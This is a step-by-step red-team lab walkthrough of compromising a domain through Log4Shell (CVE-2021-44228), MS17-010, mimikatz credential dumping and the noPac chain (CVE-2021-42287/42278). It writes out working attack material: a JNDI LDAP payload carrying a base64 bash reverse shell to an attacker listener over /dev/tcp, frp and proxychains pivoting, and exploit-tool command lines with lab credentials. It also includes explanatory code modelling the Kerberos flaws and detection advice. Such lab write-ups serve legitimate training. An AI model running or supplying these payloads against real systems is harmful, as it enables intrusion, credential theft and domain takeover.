
Title: From external-network Log4j2 RCE to the internal-network combo CVE-2021-42287 + CVE-2021-42278: taking the DC


Network Topology


Information Collection

The first step in any penetration test is information collection.

The target IP is 192.168.81.151. We first use nmap to scan the commonly used TCP ports:

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151

Two ports are open: 22 and 38080.

From the nmap output we know this is an Ubuntu host: 22 is SSH, and the service on 38080 is unknown. Let's open it in a browser.

So I tried the recently disclosed CVE-2021-44228 (Log4Shell) against it to see whether I could get a DNSlog callback.

The DNSlog callback came back, so CVE-2021-44228 is present; next, try to get a shell.

CVE-2021-44228 Exploitation

First start the JNDIExploit LDAP server on our Kali VPS (192.168.81.133):

git clone https://github.com/black9/Log4shell_JNDIExploit.git

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133

Then start a listener on port 9999 on Kali:

We use JNDIExploit's TomcatBypass route to get a reverse shell.

The reverse shell command, pointing at the Kali listener, is:

bash -i >& /dev/tcp/192.168.81.133/9999 0>&1

The reverse shell command has to be base64-encoded, because it travels inside the LDAP path of the JNDI lookup.

Capture the request in Burp, change it to send the parameter via POST, and construct the payload:

payload=${jndi:ldap://192.168.81.133:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjgxLjEzMy85OTk5IDA+JjE=}

Sending this payload finally gives us the reverse shell. Note that the base64 part of the payload must be URL-encoded twice, otherwise the command does not execute.


I found that the shell I got is inside a Docker container.

I failed to find a way to escape, but I eventually found the flag file in the /root directory:

flag{redteam.lab-1} Congratulations, you got this: saul Saul123

I got a flag, and something that looks like a username and password.

During information collection nmap showed that the target host exposes SSH on port 22, so these are probably SSH credentials.

Intranet information collection

Log in to the Ubuntu system over SSH with the credentials obtained in the previous section.

The machine has two network interfaces: ens33 connects to the external network, and ens38 talks to the intranet.

In real intranet penetration: if the foothold is Linux, try to do everything in bash and Python, since both are practically always present; if it is Windows, try to do everything in PowerShell, batch and VBS. Do not rely too much on external tools.

So we use a for loop to ping the /24 of ens38 (use -c 1 -W 1 instead if you want a faster sweep):

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo "$i is up"; fi; done

This finds another machine on the intranet: 10.0.1.7.
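Following the advice above to stay in bash and Python on a Linux foothold, here is an added example (not from the original write-up) of a pure-Python discovery sweep that goes one step beyond the ping loop: it does a TCP connect check against a few ports in parallel, so it also works where ICMP is filtered. The port list (445, 3389, 22) and the 10.0.1.0/24 range are assumptions for illustration; the self-check uses a loopback listener so it runs offline.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor


def hosts_in(cidr: str) -> list:
    """Usable host addresses of a network, e.g. 10.0.1.0/24 -> 10.0.1.1 .. 10.0.1.254."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.num_addresses <= 2:          # /31 and /32: every address is a host
        return [str(a) for a in net]
    return [str(h) for h in net.hosts()]


def tcp_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Full TCP connect; no raw sockets needed, so it runs as an unprivileged user."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def sweep(cidr: str, ports=(445, 3389, 22), timeout: float = 1.0, workers: int = 64) -> dict:
    """Return {host: [open ports]} for every host with at least one open port."""
    targets = [(h, p) for h in hosts_in(cidr) for p in ports]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda hp: (hp, tcp_open(*hp, timeout=timeout)), targets))
    found = {}
    for (host, port), is_open in results:
        if is_open:
            found.setdefault(host, []).append(port)
    return found


def self_check() -> bool:
    """Offline check: open a listener on loopback and confirm the sweep reports it."""
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port = srv.getsockname()[1]
        return sweep("127.0.0.1/32", ports=(port,), timeout=0.5) == {"127.0.0.1": [port]}


if __name__ == "__main__":
    # Against the lab's intranet segment (assumed range) this lists 10.0.1.7 with 445 open.
    for host, open_ports in sorted(sweep("10.0.1.0/24").items()):
        print(host, open_ports)
```

A connect scan completes the handshake and therefore leaves connection logs on the target (and on any firewall in between); that is the trade-off for needing no privileges or extra tooling.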

Alternatively, use a scanning tool to collect intranet information.

Quickly start an HTTP server with Python on Kali to serve the tool.

Download the tool onto the target machine and make it executable.

Run it to collect intranet information.

10.0.1.7 is alive and appears to be vulnerable to MS17-010.

Then, for convenience, I chose frp to proxy traffic through the current machine:

Configure frps.ini (the frp server, on Kali)

Configure frpc.ini (the frp client, on the Ubuntu foothold)
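The two config screenshots are not reproduced, so here is an added example of the frp ini pair (frp's classic ini format, not the project's or the author's own files) that produces the SOCKS5 proxy on port 8888 used below. The server port 7000 and the token value are assumptions; 192.168.81.133 and 8888 are the values the write-up uses. The two sections below are two separate files.

```ini
# ---- frps.ini, on Kali (192.168.81.133) ----
[common]
bind_port = 7000
# token is assumed: without it, anyone who can reach 7000 may register proxies
token = change-me

# ---- frpc.ini, on the Ubuntu foothold (run there: ./frpc -c frpc.ini) ----
[common]
server_addr = 192.168.81.133
server_port = 7000
token = change-me

# expose a SOCKS5 listener on the frps side; traffic exits from the foothold
[socks5]
type = tcp
remote_port = 8888
plugin = socks5
```

The resulting listener on 192.168.81.133:8888 is unauthenticated and reachable by anyone who can reach that port on the VPS, so in a real engagement restrict it with a firewall rule or the plugin's user/password options rather than leaving it open for the duration of the test.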

Then point Metasploit at the SOCKS5 proxy to collect more in-depth intranet information:

setg Proxies socks5:192.168.81.133:8888
setg ReverseAllowProxy true

Use the smb version detection module to scan the target:

use auxiliary/scanner/smb/smb_version

The scan shows that 10.0.1.7 is Windows 7 and that the domain REDTEAM exists.

Since it is Windows 7, there may be a MS17-010 vulnerability

MS17-010 Exploitation

From the previous section we know 10.0.1.7 is Win7, so we check it with the MS17-010 scanner module.

The check confirms that this machine is vulnerable to MS17-010.

Since the intranet target may not be able to reach out to the internet, a reverse TCP payload cannot be used; set a bind_tcp payload instead, so that the exploit connects to the target rather than the target connecting back to us.

This gives us SYSTEM on Win7 directly; next, load mimikatz to dump passwords:

meterpreter > load mimikatz
meterpreter > creds_all

Among the output:

Username  Domain   Password
root      REDTEAM  Red12345

Note that this command reads credentials from LSASS memory. The lab VM is distributed suspended and resumed, so the credential is still cached; if you reboot it instead, you must log in to Win7 once so that the credential is in memory again.

At this point I have a domain user account.

Intranet combo: CVE-2021-42287 and CVE-2021-42278

Collecting information on the current host shows that Win7 also has a second, intranet-facing interface,

and that the domain controller's IP is 10.0.0.12.

Two domain vulnerabilities were disclosed recently, CVE-2021-42287 and CVE-2021-42278, so try to exploit them directly.

The principle: suppose the domain controller's hostname is DC, so its machine account's sAMAccountName is DC$. By default any authenticated domain user can create up to 10 machine accounts (ms-DS-MachineAccountQuota). The attacker creates a machine account saulGoodman$ and, because of CVE-2021-42278 (no check that a machine account's sAMAccountName ends in $), renames it to DC. He requests a TGT as DC, then renames the account back to saulGoodman$ (or any other name), so that no account named DC exists any more. Finally he uses that TGT in an S4U2self request, asking for a service ticket on behalf of the domain administrator. Because of CVE-2021-42287, when the KDC cannot find the account DC named in the TGT, it appends a $ and looks up DC$, the real domain controller, and issues a service ticket for the administrator to the domain controller itself. That ticket is what the tools below turn into a shell on the DC.
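To make the two flaws and their fixes concrete, here is an added toy model (hypothetical illustration code, not real Kerberos, Active Directory, or any of the tools below). It keeps only the state the chain depends on: the account table, a TGT reduced to a client name plus the owner's SID (standing in for the PAC_REQUESTOR attribute Microsoft's fix adds), and the KDC's `$`-appending lookup. All names and SIDs are constructed.

```python
MACHINE_ACCOUNT_QUOTA = 10  # default ms-DS-MachineAccountQuota


class ToyKDC:
    """Minimal directory + KDC with the two flaws switchable on and off."""

    def __init__(self, dc_name="DC", fix_42278=False, fix_42287=False):
        self.fix_42278 = fix_42278          # enforce '$' on machine-account renames
        self.fix_42287 = fix_42287          # validate PAC requestor SID in S4U2self
        self.dc_sid = "S-1-5-21-1-1-1-1000"  # constructed SID of the DC's account
        self.accounts = {f"{dc_name}$": {"sid": self.dc_sid, "machine": True}}
        self.quota_used = 0
        self.next_rid = 1101

    def create_machine_account(self, name):
        """Any authenticated user may join computers until the quota is used up."""
        if self.quota_used >= MACHINE_ACCOUNT_QUOTA:
            raise PermissionError("ms-DS-MachineAccountQuota exhausted")
        name = name if name.endswith("$") else name + "$"
        self.accounts[name] = {"sid": f"S-1-5-21-1-1-1-{self.next_rid}", "machine": True}
        self.next_rid += 1
        self.quota_used += 1
        return name

    def rename(self, old, new):
        """Change sAMAccountName. CVE-2021-42278: the trailing '$' was not enforced."""
        if new in self.accounts:
            raise ValueError(f"sAMAccountName {new!r} already in use")
        if self.fix_42278 and self.accounts[old]["machine"] and not new.endswith("$"):
            raise ValueError("machine account sAMAccountName must end with '$'")
        self.accounts[new] = self.accounts.pop(old)

    def as_req(self, cname):
        """Issue a TGT: client name plus the SID of the account that owns it."""
        return {"cname": cname, "sid": self.accounts[cname]["sid"]}

    def s4u2self(self, tgt, impersonate):
        """Service ticket for `impersonate` to the service that presented the TGT."""
        target = tgt["cname"]
        if target not in self.accounts:
            # CVE-2021-42287: the KDC retries the lookup with '$' appended
            target = target + "$"
            if target not in self.accounts:
                raise LookupError("client name not found")
        if self.fix_42287 and self.accounts[target]["sid"] != tgt["sid"]:
            raise PermissionError("PAC requestor SID does not match the account")
        return {"service": target, "client": impersonate,
                "service_sid": self.accounts[target]["sid"]}


def run_attack(kdc, dc_name="DC", computer="saulGoodman"):
    """The five steps of the chain; returns the final service ticket."""
    acct = kdc.create_machine_account(computer)           # 1. saulGoodman$
    kdc.rename(acct, dc_name)                               # 2. sAMAccountName -> DC (no '$')
    tgt = kdc.as_req(dc_name)                               # 3. TGT issued to "DC"
    kdc.rename(dc_name, computer + "$")                     # 4. rename back; "DC" now unknown
    return kdc.s4u2self(tgt, impersonate="administrator")   # 5. KDC resolves DC -> DC$


def is_dc_ticket(kdc, ticket):
    """True when the ticket is for the real domain controller's account."""
    return ticket["service_sid"] == kdc.dc_sid


def attack_blocked(**fixes):
    """Name of the exception that stops the chain on a KDC with the given fixes, or None."""
    try:
        run_attack(ToyKDC(**fixes))
    except (ValueError, PermissionError, LookupError) as e:
        return type(e).__name__
    return None


if __name__ == "__main__":
    kdc = ToyKDC()
    print("unpatched:", run_attack(kdc))
    print("fix_42278 only:", attack_blocked(fix_42278=True))
    print("fix_42287 only:", attack_blocked(fix_42287=True))
```

Either fix alone breaks the chain: enforcing the `$` stops step 2, and checking the requestor SID stops step 5 even though the `$` fallback still happens. On the defensive side, the rename in step 2 and the rename back in step 4 both show up on the DC as account-name-change events (4781 "The name of an account was changed") on a computer account, which is a cheap, high-signal detection for this chain.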

So add a SOCKS5 proxy in MSF,

add a route through the Win7 session:

run autoroute -s 10.0.0.7/24

and then add the new proxy to the local proxychains configuration.

Tool download links (any one of the three does the job):

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

https://github.com/waterrr/noPac

Then run the script through proxychains (one line per tool):

proxychains python3 sam_the_admin.py 'redteam.lab/root:Red12345' -dc-ip 10.0.0.12 -shell
proxychains python noPac.py redteam.lab/root:'Red12345' -dc-ip 10.0.0.12 -shell --impersonate administrator -use-ldap
proxychains python3 exp.py 'redteam/root:Red12345' -dc-ip 10.0.0.12 -shell

Finally, I got the last flag.

Target machine environment: https://pan.baidu.com/s/18pXdC2f_zDsXONpSUg1fYg (extraction code: 8dcy)

Original article: http://www.kryst4l.cn/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-log4j2-RCE-%E5%86%8D%E5%88%B0%E5%86%85%E7%BD%91%E6%A0%B8%E5%BC%B9%E7%BB%84%E5%90%88%E6%8B%B3%E6%BC%8F%E6%B4%9E-CVE-2021-42287%E3%80%81CVE-2021-42278-%E6%8B%BF%E5%88%B0-DC/
